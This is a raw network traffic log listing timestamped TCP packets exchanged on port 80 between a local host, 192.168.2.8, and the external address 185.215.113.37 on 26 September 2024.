Sep 26, 2024 02:40:12.130923033 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130930901 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130961895 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130980968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130994081 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130999088 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.131022930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.131028891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.131036997 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.131042957 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.131063938 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.131077051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215184927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215266943 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215271950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215284109 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215298891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215313911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215334892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215620995 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215631962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215641975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215653896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215662003 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215671062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215688944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215719938 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215776920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215787888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215800047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215809107 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215812922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.215822935 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.215842009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.253977060 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.253990889 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254002094 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254071951 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254420042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254466057 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254501104 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254513025 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254524946 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254539967 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254555941 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254564047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254575014 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254601002 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254618883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254647970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254659891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254677057 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254684925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254697084 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254714966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254734993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254746914 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254764080 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254774094 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254786968 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254801989 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254829884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254842043 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254853964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254873991 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254888058 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254894018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254913092 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254925013 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.254951000 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.254965067 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255001068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255012035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255023956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255037069 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255039930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255050898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255053043 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255081892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255125046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255140066 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255151033 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255162954 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255162954 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255177975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255187988 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255217075 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255244970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255265951 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255281925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255295038 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255305052 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255310059 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255331039 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255342960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255508900 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255521059 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255548000 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255552053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255563021 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255565882 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255578995 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255585909 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255600929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255608082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255625963 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255633116 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255645037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255646944 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255661011 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255667925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255681992 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255701065 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255762100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255774021 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255784988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255796909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255800962 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255810022 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255810976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255825043 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255831957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255839109 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.255858898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.255867004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256006002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256020069 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256030083 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256046057 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256046057 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256061077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256062031 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256074905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256091118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256083965 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256107092 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256125927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256127119 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256158113 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256166935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256180048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256191969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256205082 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256231070 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256346941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256360054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256371975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256383896 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256388903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256402016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256413937 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256414890 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256439924 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256455898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256484985 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256498098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256519079 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256535053 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256649017 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256661892 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256675005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256686926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256689072 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256697893 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256700039 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256715059 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256722927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256727934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256741047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256752014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256757975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256769896 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256773949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256794930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256817102 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256930113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256942987 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256953955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256967068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256969929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256985903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.256993055 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.256999969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257025957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257035971 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257060051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257071972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257097960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257111073 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257164955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257178068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257198095 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257210016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257221937 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257221937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257235050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257246971 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257247925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257260084 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257261992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257276058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257281065 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257289886 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257303953 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257304907 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257317066 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257323027 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257332087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257344007 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.257350922 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.257375956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305773973 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305809975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305824041 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305835962 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305871964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305876017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305876017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305886030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305897951 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305910110 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305913925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305926085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305926085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.305944920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.305964947 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.306271076 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306315899 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.306469917 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306482077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306493044 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306504965 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306510925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.306519032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306529999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.306535959 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.306613922 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345082998 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345107079 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345118046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345175028 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345186949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345201015 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345211029 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345256090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345313072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345324993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345338106 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345347881 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345355034 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345370054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345382929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345388889 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345426083 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345459938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345472097 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345484018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345494032 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345496893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345510960 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345521927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345523119 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345536947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345549107 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345566988 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345581055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345613003 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345659018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345669985 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345681906 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345690966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345695972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345712900 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345732927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345807076 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345819950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345832109 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345844030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345844030 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345858097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345860958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345879078 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345904112 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345943928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345954895 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345973969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345978975 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345987082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.345995903 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.345999956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346013069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346013069 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346026897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346035004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346066952 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346260071 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346271992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346283913 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346297026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346297026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346309900 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346322060 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346322060 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346335888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346353054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346355915 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346373081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346391916 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346445084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346457958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346470118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346487999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346487999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346501112 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346507072 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346515894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346528053 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346529007 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346554995 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346581936 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346748114 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346760035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346770048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346781969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346782923 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346796036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346801996 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346808910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346824884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346827030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346841097 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.346843004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.346853971 CEST	80	49705	185.215.113.37	192.168.2.8
